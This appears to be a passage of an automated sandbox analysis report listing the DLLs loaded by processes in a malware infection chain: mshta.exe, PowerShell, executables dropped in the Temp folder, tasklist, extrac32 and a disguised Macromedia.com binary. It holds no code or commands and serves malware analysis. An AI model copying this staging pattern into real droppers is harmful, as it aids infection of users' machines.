Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Section loaded: nlaapi.dll
